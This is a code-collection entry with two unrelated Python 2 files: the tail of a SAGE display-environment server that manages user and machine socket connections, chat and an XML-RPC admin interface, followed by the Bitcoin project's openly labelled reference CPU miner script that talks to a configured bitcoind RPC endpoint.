self.Stop() #connection was closed
return False
# since recv is not guaranteed to receive exactly CHUNK_SIZE bytes
# so keep receiving until it gets the whole chunk
while len( msg ) < MSG_SIZE:
msg = msg + self.socket.recv(MSG_SIZE - len( msg))
# strip all the empty spaces from the message
cleanMsg = self.CleanBuffer( msg )
cleanMsg = string.strip( cleanMsg )
return cleanMsg
# converts all non-printable characters from the buffer to white spaces
# (so that they can be removed using string.strip() function)
def CleanBuffer( self, stBuffer ):
stNewBuffer = ""
for ch in stBuffer:
if ( ch in string.printable ):
stNewBuffer = stNewBuffer + ch
else:
stNewBuffer = stNewBuffer + " "
return stNewBuffer
#-------------------------------------------------------
# MESSAGE CALLBACKS
#-------------------------------------------------------
def OnRegisterMachineMessage(self, data):
""" there are two different fsManagers so handle them differently """
if self.receivedRegisterMessage:
# record the time when it was reported
self.lastReportTime = time.time()
return
self.receivedRegisterMessage = True
tokens = string.split(data, "\n", 3)
if len(tokens[0].split()) == 1: # based on this we will know which fsManger is this
self.name = tokens[0]
self.ip = tokens[1]
self.port = int(tokens[2])
self.systemIP = self.ip #make them the same as public if not given
self.systemPort = self.port
self.oldStyleSAGE = True
else: # new style SAGE includes the system port/ip as well as the sage version
(self.name, self.sageVersion) = tokens[0].split()
sys = tokens[1].split()
self.systemIP = sys[0].strip()
self.systemPort = int(sys[1].strip())
pub = tokens[2].split()
self.ip = pub[0].strip()
self.port = int(pub[1].strip())
self.machineId = self.ip+":"+str(self.port)
self.displayInfo = tokens[3]
self.server.RegisterMachine(self)
# record the stats
stats = "\nSAGE connected: "+self.name+" "+str(self.machineId)+" "+str(self.displayInfo)+" "+str(time.asctime())
WriteStats(stats)
############################################################################
#
# CLASS: SingleUser
#
# DESCRIPTION: This is basically a thread that deals with the connection
# to ONLY ONE SAGE UI. It's created by the Server class upon
# connection from a user and it receives a clientsocket that
# was internally created by the Server. It then uses this
# socket for all the communication. One of these exists for
# every user that is connected to this Server and the Server class
# keeps these SingleUser objects in a list.
#
# DATE: May, 2005
#
############################################################################
class SingleUser(Thread):
def __init__(self, socket, address, server):
Thread.__init__(self)
self.socket = socket
self.socket.settimeout(SOCKET_TIMEOUT)
self.server = server
self.threadKilled = False
self.username = ""
self.info = ""
self.machineList = [] # the SAGE machines that this user is connected to ( a list of machineIds )
self.ip = address[0]
self.registered = False
self.ui_version = "2.0" # default
self.newStyle = False
self.messageCallback = {}
self.messageCallback[ 2000 ] = self.OnRegister
self.messageCallback[ 2001 ] = self.OnChatMessage
self.messageCallback[ 2002 ] = self.OnCheckUsername
self.messageCallback[ 2003 ] = self.OnUnregisterUser
# send the first reply message with machine status
self.server.OnConnectUser(self)
self.stopped = False
def Stop(self, unregister=True):
self.stopped = True
# record the stats
stats = "\nUser disconnected: "+self.GetName()+" "+str(self.ip)+" "+str(time.asctime())
WriteStats(stats)
self.threadKilled = True
WriteToFile( "\n*** Connection closed with user: \"" + self.username + "\" <" + time.asctime() + ">")
if unregister and self.registered:
self.server.UnregisterUser(self, self.username)
self.server.OnDisconnectUser(self)
#self.threadKilled = True
self.socket.close()
def GetInfo(self):
return self.info
def GetName(self):
return self.username
def GetMachines(self):
return self.machineList
def IsNewStyle(self):
return self.newStyle
#-------------------------------------------------------
# RECEIVING
#-------------------------------------------------------
# runs in a thread... started in the Server class
def run(self):
while not self.threadKilled:
try:
# this first receive will receive the length of the data
cleanMsg = self.GetMessage()
if not cleanMsg:
break #connection was closed
msgHeader = string.split( cleanMsg, "\n", 1 )
if len( msgHeader ) > 0:
code = int(msgHeader[0])
data = msgHeader[1]
else:
WriteToFile( "\n ERROR: message could not be split correctly into (code, data)")
break
# print what we received
if messageNames.has_key(code):
WriteToFile( "RECEIVED: \"" + messageNames[code] + "\" from " + self.username + " (" + str(self.ip) + ")")
# call the appropriate function to handle the incoming data
if self.messageCallback.has_key( code ):
self.messageCallback[ code ](data)
else:
WriteToFile("\nERROR: Message code " + str(code) + " unrecognized")
except socket.timeout:
continue
except socket.error:
WriteToFile( "\nERROR: UsersServer: socket error in connection with: " + self.username)
self.Stop()
break
if self.stopped == False:
WriteToFile("Stopping the thread")
self.Stop()
WriteToFile("Thread from " + self.username + " has died")
def GetMessage(self, clean=True, MSG_SIZE=CHUNK_SIZE):
# this first receive will receive the length of the data
msg = self.socket.recv(MSG_SIZE)
if len( msg ) < 2:
self.Stop() #connection was closed
return False
# since recv is not guaranteed to receive exactly CHUNK_SIZE bytes
# so keep receiving until it gets the whole chunk
while len( msg ) < MSG_SIZE:
msg = msg + self.socket.recv(MSG_SIZE - len( msg))
if clean:
# strip all the empty spaces from the message
cleanMsg = self.CleanBuffer( msg )
cleanMsg = string.strip( cleanMsg )
return cleanMsg
else:
return msg
# converts all non-printable characters from the buffer to white spaces
# (so that they can be removed using string.strip() function)
def CleanBuffer( self, stBuffer ):
stNewBuffer = ""
for ch in stBuffer:
if ch == '\0': #this is our message separator so handle it separately
stNewBuffer += ch
elif ch in string.printable:
stNewBuffer += ch
else:
stNewBuffer += " "
return stNewBuffer
#-------------------------------------------------------
# SENDING
#-------------------------------------------------------
# make the message with the right code and send it
def MakeMsg(self, code, data):
msg = '%8s\n%s' %(code,data)
WriteToFile( "SEND: \"" + messageNames[code] + "\" to " + self.username)
msg = msg + ' ' * (MSGLEN-len(msg))
self.Send(msg)
# just performs the send operation
def Send(self, msg):
try:
self.socket.send(msg)
except socket.error:
WriteToFile( "\nERROR: UsersServer: Could not send message: socket error with: "+self.username )
self.socket.close()
#self.Stop()
# record the stats
stats = "\nUser disconnected: "+self.GetName()+" "+str(self.ip)+" "+str(time.asctime())
WriteStats(stats)
#self.Stop()
# the run() method will catch this as well and it will handle the cleanup
# these functions are called by the main Server class in order to send
# messages to all the users via their own sockets used in this SingleUser class
def SendChatMessage(self, message):
self.MakeMsg(30002, message)
# form a message and send the users status
def SendUsersStatusMessage(self, statusList):
message = ""
# make the message out of the machine status list
for userInfo in statusList:
if message != "": message += SEPARATOR #add the separator before adding each new machine info
for infoItem in userInfo:
message += str(infoItem) + "\n"
self.MakeMsg(30001, message)
# form a message and send the machine status
def SendMachinesStatusMessage(self, statusList):
message = ""
# make the message out of the machine status list
for machineInfo in statusList:
if message != "": message += SEPARATOR #add the separator before adding each new machine info
for infoItem in machineInfo:
message += str(infoItem) + "\n"
self.MakeMsg(30000, message)
def SendUsernameOKMessage(self, usernameOK):
self.MakeMsg( 30003, str(int(usernameOK)) )
#-------------------------------------------------------
# MESSAGE CALLBACKS
#-------------------------------------------------------
def OnRegister(self, data):
tokens = string.split(data, "\n")
self.username = tokens[0]
self.info = tokens[1]
machineId = tokens[2]
if not machineId in self.machineList:
self.machineList.append(machineId)
# record the stats
stats = "\nUser registered: "+self.GetName()+" "+str(self.ip)+" "+str(machineId)+" "+str(time.asctime())
WriteStats(stats)
self.server.RegisterUser(self, self.username)
# if the version of the connected UI handles system ip/port
# for each machine, send it after the registration message
if self.IsNewStyle():
status = self.server.MakeNewMachinesStatusList()
self.SendMachinesStatusMessage(status)
def OnChatMessage(self, data):
tokens = string.split(data, "\n", 2)
if tokens[1] == "all":
toRoom = "all"
else:
toRoom = tokens[1]
self.server.ForwardChatMessage(self, toRoom, data)
def OnCheckUsername(self, data):
tokens = string.split(data, "\n")
if len(tokens) > 1: # sageui v2.82+ sends a version number
self.ui_version == tokens[1].strip()
self.newStyle = True
self.SendUsernameOKMessage(self.server.IsUsernameOK(self, tokens[0]) )
def OnUnregisterUser(self, data):
tokens = string.split(data, "\n")
username = tokens[0]
machineId = tokens[1]
if machineId in self.GetMachines():
self.machineList.remove(machineId)
# record the stats
stats = "User unregistered: "+self.GetName()+" "+str(self.ip)+" "+str(machineId)+" "+str(time.asctime())
WriteStats(stats)
self.server.UpdateUsers()
############################################################################
#
# CLASS: SingleLauncher
#
# DESCRIPTION: This class describes one appLauncher connection for use by
# SAGE UIs. It mainly contains a list of applications and their configs
#
#
############################################################################
class SingleLauncher:
def __init__(self, launcherId, name, ip, port, appList):
self.port = port
self.appList = appList
self.ip = ip
self.launcherId = launcherId
self.name = name
self.oldT = time.time()
self.maxReportTime = 10 #allow maximum 8 seconds between reports
def getId(self):
return self.launcherId
def getIP(self):
return self.ip
def getAppList(self):
return self.appList
def setAppList(self, appList):
self.appList = appList
def getPort(self):
return self.port
def getName(self):
return self.name
def isAlive(self):
if (time.time() - self.oldT) < self.maxReportTime:
return True
else:
return False
def report(self):
self.oldT = time.time()
############################################################################
#
# CLASS: Server
#
# DESCRIPTION: This server should run as a deamon and constantly listen for
# connections on a certain port. Once it accepts a connection
# it spawns a thread (SingleUser) that takes care of listening for the
# incoming messages and sending messages on that socket.
# It also relays all the incoming messages to their corresponding
# recepients. To do that it keeps track of all the users connected
# in a list registeredUsers[]. It also listens for connections
# from fsManagers and keeps track of them in connectedMachines[] (
# a hash of singleMachines).
#
# DATE: May, 2005
#
############################################################################
class Server:
def __init__(self):
self.serverRunning = True
# start the XMLRPC server in a thread
xmlrpcServer = Thread(target=self.StartXMLRPCServer)
xmlrpcServer.start()
# start the two servers listening on separate ports
machinesServer = Thread(target=self.StartMachinesServer)
machinesServer.start()
try:
self.StartUsersServer() #start this one in the main thread so that we can capture
#keystrokes such as Ctrl-C
except KeyboardInterrupt:
WriteToFile ("\n****** Shutting down the server *******")
self.serverRunning = False
self.CloseAllUserConnections()
self.CloseAllSAGEConnections()
self.xmlrpc.server_close()
#logFile.close()
#------------------------------------------------------------------------------
# XML-RPC STUFF - FOR REMOTE ADMINISTRATION, APPLAUNCHER AND SAGE UI PROXY
#------------------------------------------------------------------------------
def StartXMLRPCServer(self):
self.registeredLaunchers = {} #key=launcherID, value=SingleLauncher object
# start the XML-RPC server
self.xmlrpc = XMLRPCServer(("", 8009))
# users
self.xmlrpc.register_function(self.GetRegisteredUsers)
self.xmlrpc.register_function(self.GetUserInfo)
self.xmlrpc.register_function(self.DisconnectUser)
# machines
self.xmlrpc.register_function(self.GetMachineInfo)
self.xmlrpc.register_function(self.GetRegisteredMachines)
self.xmlrpc.register_function(self.DisconnectMachine)
# appLauncher
self.xmlrpc.register_function(self.ReportLauncher)
self.xmlrpc.register_function(self.GetRegisteredLaunchers)
self.xmlrpc.register_function(self.UnregisterLauncher)
WriteToFile ("Starting the XML-RPC Server...\n")
while self.serverRunning:
try:
self.xmlrpc.handle_request() #accept and process xmlrpc requests
self.__checkLaunchers() #check to see whether every launcher is still alive
except socket.timeout:
continue
except:
WriteToFile( "\n=====> XMLRPC Server ERROR:" )
WriteToFile( "".join(tb.format_exception(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2])) )
continue
### loops through all the app launchers and checks whether they are still alive
### the minimum frequency of checks is defined by the timeout set int XMLRPCServer constructor
def __checkLaunchers(self):
for l in self.registeredLaunchers.values():
if not l.isAlive():
WriteToFile("Launcher "+l.getName()+"("+l.getId()+") unregistered")
self.UnregisterLauncher(l.getId())
### called by each appLauncher in order to register with the server
def ReportLauncher(self, launcherName, launcherIP, launcherPort, appList):
launcherId = launcherIP+":"+str(launcherPort)
if launcherId in self.registeredLaunchers:
self.registeredLaunchers[launcherId].report() # launcher already exists so just update its last report time
self.registeredLaunchers[launcherId].setAppList(appList)
else:
l = SingleLauncher(launcherId, launcherName, launcherIP, launcherPort, appList)
WriteToFile("Launcher "+l.getName()+"("+l.getId()+") registered")
self.registeredLaunchers[launcherId] = l
return launcherId
### removes the appLauncher from a list of registered ones
def UnregisterLauncher(self, launcherId):
if launcherId in self.registeredLaunchers:
del self.registeredLaunchers[ launcherId ]
return 1
### return a hash of all the app launchers running
### key= "name:launcherId" , value=appList (that's another hash of appNames and their configs)
def GetRegisteredLaunchers(self):
tempHash = {}
for l in self.registeredLaunchers.itervalues():
tempHash[ l.getName()+":"+l.getId() ] = l.getAppList()
return tempHash
### return a list of currently registered users and machines
def GetRegisteredUsers(self):
self.registeredUsersLock.acquire()
users = self.registeredUsers.keys()
self.registeredUsersLock.release()
return users
def GetRegisteredMachines(self):
self.connectedMachinesLock.acquire()
machineList = []
for machineId, singleMachine in self.connectedMachines.iteritems():
machineList.append(singleMachine.GetName() + " - " + str(machineId))
self.connectedMachinesLock.release()
return machineList
## def GetConnectedUsers(self):
## self.connectedUsersLock.acquire()
## users = []
## for user in self.connectedUsers:
## users.append(user.GetName())
## self.connectedUsersLock.release()
## return users
### return user and machine info
def GetUserInfo(self, username):
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key(username):
singleUser = self.registeredUsers[username]
machineList = []
self.connectedMachinesLock.acquire()
for machineId in singleUser.GetMachines():
if self.connectedMachines.has_key(machineId):
machineList.append(self.connectedMachines[machineId].GetName())
self.connectedMachinesLock.release()
self.registeredUsersLock.release()
return machineList #singleUser.GetMachines()
else:
self.registeredUsersLock.release()
return -1
def GetMachineInfo(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key(machineId):
m = self.connectedMachines[machineId]
self.connectedMachinesLock.release()
#now make a list of all the users that are connected to this machine
self.registeredUsersLock.acquire()
userList = []
for name, singleUser in self.registeredUsers.iteritems():
if machineId in singleUser.GetMachines():
userList.append(name)
self.registeredUsersLock.release()
return (m.GetName(), m.GetIP(), m.GetPort(), m.GetId(), m.IsAlive(), m.GetDisplayInfo(), userList)
else:
self.connectedMachinesLock.release()
return (-1,-1,-1,-1,-1,-1,-1)
### allow the user to close individual connections with SAGE and users
def DisconnectUser(self, username):
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key(username):
singleUser = self.registeredUsers[username]
singleUser.Stop()
self.registeredUsersLock.release()
return True
def DisconnectMachine(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key(machineId):
singleMachine = self.connectedMachines[machineId]
singleMachine.Stop()
self.connectedMachinesLock.release()
return True
#----------------------------------------------------------------------------------------
# THE SERVERS RUNNING IN THREADS RECEIVING CONNECTIONS FROM USERS AND SAGES
#----------------------------------------------------------------------------------------
# runs in the main thread
def StartUsersServer(self):
self.registeredUsers = {} # a hash of SingleUsers for every registered user (keyed by username)
self.registeredUsersLock = RLock() #used to lock the access to self.registeredUsers hash
self.connectedUsers = [] # this includes all the users that are connected to the server
self.connectedUsersLock = RLock() # but not necessarily registered with it. (so registeredUsers is a subset of this)
self.pendingUsernames = [] # usernames that have been checked with the server but not yet registered
self.pendingUsernamesLock = RLock()
# create the server socket and accept a connection
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if serversocket is None:
WriteToFile( "\n\nERROR: Server socket could not be created... exiting" )
return False
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", USER_SERVER_PORT))
serversocket.listen(MAX_USER_CONNECTIONS)
serversocket.settimeout(SOCKET_TIMEOUT)
WriteToFile( "Users Server waiting for connections on port " + str(USER_SERVER_PORT) + "...\n" )
while self.serverRunning:
try:
(clientsocket, address) = serversocket.accept()
except socket.timeout:
continue
except:
WriteToFile( "\n\nUsers Server Not accepting any more connections... exiting <" + time.asctime() + ">\n" )
self.CloseAllUserConnections()
self.serverRunning = False
break
WriteToFile( "\n*** Connection accepted from " + str(address[0]) + " <" + time.asctime() + ">" )
# create a SingleUser instance and start the receiver in a thread
t = SingleUser(clientsocket, address, self)
self.connectedUsersLock.acquire()
self.connectedUsers.append(t) #add the user to the list of all connected users
self.connectedUsersLock.release()
t.start()
WriteToFile("\nUsers Server exited")
# runs in a thread
def StartMachinesServer(self):
self.connectedMachines = {} # a hash of SingleMachines for every connected SAGE (keyed by id)
self.connectedMachinesLock = RLock()
# create the server socket and accept a connection
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if serversocket is None:
WriteToFile( "\n\nERROR: SAGE Server socket could not be created... exiting" )
return False
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serversocket.bind(("", SAGE_SERVER_PORT))
serversocket.listen(MAX_SAGE_CONNECTIONS)
serversocket.settimeout(SOCKET_TIMEOUT)
WriteToFile( "SAGE Server waiting for connections on port " + str(SAGE_SERVER_PORT) + "...\n" )
while self.serverRunning:
try:
(clientsocket, address) = serversocket.accept()
except socket.timeout:
continue
except:
WriteToFile( "\n\nSAGE Server Not accepting any more connections... exiting <" + time.asctime() + ">\n" )
self.CloseAllSAGEConnections()
self.serverRunning = False
break
WriteToFile( "\n*** SAGE Connection accepted from " + str(address[0]) + " <" + time.asctime() + ">" )
# create a SingleMachine instance and start the receiver in a thread
t = SingleMachine(clientsocket, address, self)
t.start()
WriteToFile("\nSAGE Server exited")
self.xmlrpc.server_close()
def CloseAllUserConnections(self):
for singleUser in self.registeredUsers.itervalues():
singleUser.Stop(unregister=False) #we dont want to unregister because the server is closing anyway
def CloseAllSAGEConnections(self):
for singleMachine in self.connectedMachines.itervalues():
singleMachine.Stop(unregister=False) #we dont want to unregister because the server is closing anyway
#-------------------------------------------------------
# MESSAGE CALLBACKS - USERS
#-------------------------------------------------------
# when the user connects, we need to send him the list of all the SAGE
# machines registered with this server
def OnConnectUser(self, singleUser):
self.connectedMachinesLock.acquire()
singleUser.SendMachinesStatusMessage(self.MakeMachinesStatusList())
self.connectedMachinesLock.release()
# if the user connected but never registered, we still have to remove him from this list
def OnDisconnectUser(self, singleUser):
# remove from the pending usernames if connected
self.pendingUsernamesLock.acquire()
if singleUser.GetName() in self.pendingUsernames:
self.pendingUsernames.remove(singleUser.GetName())
self.pendingUsernamesLock.release()
# remove from connected users list
self.connectedUsersLock.acquire()
if singleUser in self.connectedUsers:
self.connectedUsers.remove(singleUser)
self.connectedUsersLock.release()
# adds the new user keyed by its name and makes the new status list
# returns: true if successful, false otherwise (if username already exists)
def RegisterUser(self, singleUser, username):
self.registeredUsersLock.acquire()
if not self.registeredUsers.has_key(username) or self.registeredUsers[username].ip == singleUser.ip:
self.registeredUsers[ username ] = singleUser # add the user to the list
singleUser.registered = True
# remove from the list of pending usernames
self.pendingUsernamesLock.acquire()
if username in self.pendingUsernames:
self.pendingUsernames.remove(username)
self.pendingUsernamesLock.release()
# update the status of other users
self.UpdateUsers()
self.registeredUsersLock.release()
def UnregisterUser(self, singleUser, username):
# remove the user from the list of all the connected users
self.connectedUsersLock.acquire()
if singleUser in self.connectedUsers:
self.connectedUsers.remove(singleUser)
WriteToFile("removed "+username+" from connectedUsers")
self.connectedUsersLock.release()
# now remove him from the list of registered users
self.registeredUsersLock.acquire()
if self.registeredUsers.has_key( username ):
del self.registeredUsers[ username ]
self.UpdateUsers()
WriteToFile("removed "+username+" from registeredUsers")
self.registeredUsersLock.release()
# now, check all the rooms that the user was connected to and see if any
# of them are empty now that the user has left... if there are empty rooms,
# close them
emptyRooms = False
self.connectedMachinesLock.acquire()
for room in self.connectedMachines.keys()[:]: #loop through all the machines just in case there are some daemons
if self.connectedMachines.has_key(room) and (not self.connectedMachines[room].IsAlive()) and self.IsRoomEmpty(room):
emptyRooms = True
del self.connectedMachines[room]
WriteToFile("closed the room "+room)
if emptyRooms:
self.UpdateMachines()
self.connectedMachinesLock.release()
# updates all the users with the new status (based on self.registeredUsers)
def UpdateUsers(self):
self.registeredUsersLock.acquire()
statusList = self.MakeUsersStatusList()
for username, singleUser in self.registeredUsers.iteritems():
if len(singleUser.GetMachines()) > 0:
singleUser.SendUsersStatusMessage(statusList)
self.registeredUsersLock.release()
# forwads the chat message either to all the chat rooms or a specific one
def ForwardChatMessage(self, sender, toRoom, message):
self.registeredUsersLock.acquire()
for name, singleUser in self.registeredUsers.iteritems():
singleUser.SendChatMessage(message)
self.registeredUsersLock.release()
# checks for duplicates in usernames
def IsUsernameOK(self, singleUser, username):
self.registeredUsersLock.acquire()
self.pendingUsernamesLock.acquire()
if username in self.registeredUsers: # username already exists
if self.registeredUsers[username].ip == singleUser.ip: # its the same user reconnecting so it's OK
usernameTaken = False
else:
usernameTaken = True
elif username in self.pendingUsernames:
usernameTaken = True
else:
usernameTaken = False
if not usernameTaken:
self.pendingUsernames.append(username)
t = Timer(2, self.ExpireUsername, [username])
t.start()
self.pendingUsernamesLock.release()
self.registeredUsersLock.release()
return not usernameTaken
def ExpireUsername(self, username):
# remove from the list of pending usernames
self.pendingUsernamesLock.acquire()
if username in self.pendingUsernames:
self.pendingUsernames.remove(username)
self.pendingUsernamesLock.release()
#make the status list consisting of name,info,machine,name,info,machine...
def MakeUsersStatusList(self):
statusList = []
keys = self.registeredUsers.keys()
keys.sort()
for username in keys:
user = self.registeredUsers[username]
tempList = []
tempList.append(username)
tempList.append(user.GetInfo())
for machine in user.GetMachines():
tempList.append(machine)
statusList.append(tempList)
return statusList
#-------------------------------------------------------
# MESSAGE CALLBACKS - MACHINES
#-------------------------------------------------------
#registers SAGE with the server so that it's visible to the users
def RegisterMachine(self, singleMachine):
machineId = singleMachine.GetId()
self.connectedMachinesLock.acquire()
if not self.connectedMachines.has_key( machineId ):
self.connectedMachines[ machineId ] = singleMachine
self.UpdateMachines() #update all the users with the new machine status
else: #the old singleMachine was still preserved since there were some users in it still
WriteToFile("\n* The machine "+str(machineId)+" already exists so trying to close the connection with the previous one")
self.connectedMachines[ machineId ].Stop(False) # this is a preventative measure just in case it was a zombie
del self.connectedMachines[ machineId ] #delete the old one and save the new one
self.connectedMachines[ machineId ] = singleMachine
self.UpdateMachines()
self.connectedMachinesLock.release()
# updates all the users with the new machine status (based on self.connectedMachines)
def UpdateMachines(self):
self.connectedUsersLock.acquire()
statusList = self.MakeMachinesStatusList()
newStatusList = self.MakeNewMachinesStatusList()
for singleUser in self.connectedUsers:
if singleUser.IsNewStyle(): # ui 2.82 and above gets the systemip/port info as well
singleUser.SendMachinesStatusMessage(newStatusList)
else:
singleUser.SendMachinesStatusMessage(statusList)
self.connectedUsersLock.release()
# removes the machine keyed by its machineId
def UnregisterMachine(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key( machineId ):
if self.IsRoomEmpty( machineId ): #if the room was determined to be empty, close it
del self.connectedMachines[machineId]
self.UpdateMachines()
self.connectedMachinesLock.release()
# check if there are any users still left in this room,
# if there are, return FALSE, otherwise return TRUE
def IsRoomEmpty(self, machineId):
roomEmpty = True
self.registeredUsersLock.acquire()
registeredUsers = self.registeredUsers.copy()
self.registeredUsersLock.release()
for singleUser in registeredUsers.values():
if machineId in singleUser.GetMachines():
roomEmpty = False
break # there is at least one user still left in the room, so leave it open
return roomEmpty
# it makes the list of currently connected machines
def MakeMachinesStatusList(self):
statusList = [] #make the status list consisting of [name,ip,port,id,alive], [name,ip,port,id,alive], ....
keys = self.connectedMachines.keys()
keys.sort()
for machineId in keys:
tempList = []
singleMachine = self.connectedMachines[machineId]
tempList.append( singleMachine.GetName() )
tempList.append( singleMachine.GetIP() )
tempList.append( singleMachine.GetPort() )
tempList.append( machineId )
tempList.append( int(singleMachine.IsAlive()) )
tempList.append( singleMachine.GetDisplayInfo() )
statusList.append(tempList)
return statusList
# this is for new style UIs that accept system ip/port
# as well
def MakeNewMachinesStatusList(self):
statusList = []
keys = self.connectedMachines.keys()
keys.sort()
for machineId in keys:
tempList = []
singleMachine = self.connectedMachines[machineId]
tempList.append( singleMachine.GetName() )
tempList.append( singleMachine.GetIP() )
tempList.append( singleMachine.GetPort() )
tempList.append( machineId )
tempList.append( int(singleMachine.IsAlive()) )
tempList.append( singleMachine.GetDisplayInfo() )
tempList.append( singleMachine.GetSystemIP()+" "+str(singleMachine.GetSystemPort()))
statusList.append(tempList)
return statusList
#-----------------------------------------------------------------------------------------------
class XMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
allow_reuse_address = True
def __init__(self, addr):
SimpleXMLRPCServer.SimpleXMLRPCServer.__init__(self, addr, logRequests=False)
self.socket.settimeout(2) # so that handle_request times out and we can check all appLaunchers
def main( argv ):
global USER_SERVER_PORT
global SAGE_SERVER_PORT
global PRINT_TO_SCREEN
WriteToFile("\n\n\n#####################################################################\n")
WriteToFile(" SAGE Server HAS BEEN RESTARTED\t<" + time.asctime() + ">")
WriteToFile("\n#####################################################################\n\n\n")
WriteStats("\n\nSERVER RESTARTED\t"+str(time.asctime())+"\n\n")
# get the arguments (port)
if len(argv) == 3:
if "-v" in argv:
PRINT_TO_SCREEN = True
else:
print "Usage: python UsersServer.py [USER_SERVER_PORT] [SAGE_SERVER_PORT]\n"
sys.exit(0)
elif len(argv) > 3:
USER_SERVER_PORT = int(argv[2])
SAGE_SERVER_PORT = int(argv[3])
if "-v" in argv:
PRINT_TO_SCREEN = True
# start the server accepting connections at the specified port
server = Server()
if __name__ == '__main__':
main( ['', os.path.basename( sys.argv[0] )] + sys.argv[1:] )
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8432
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
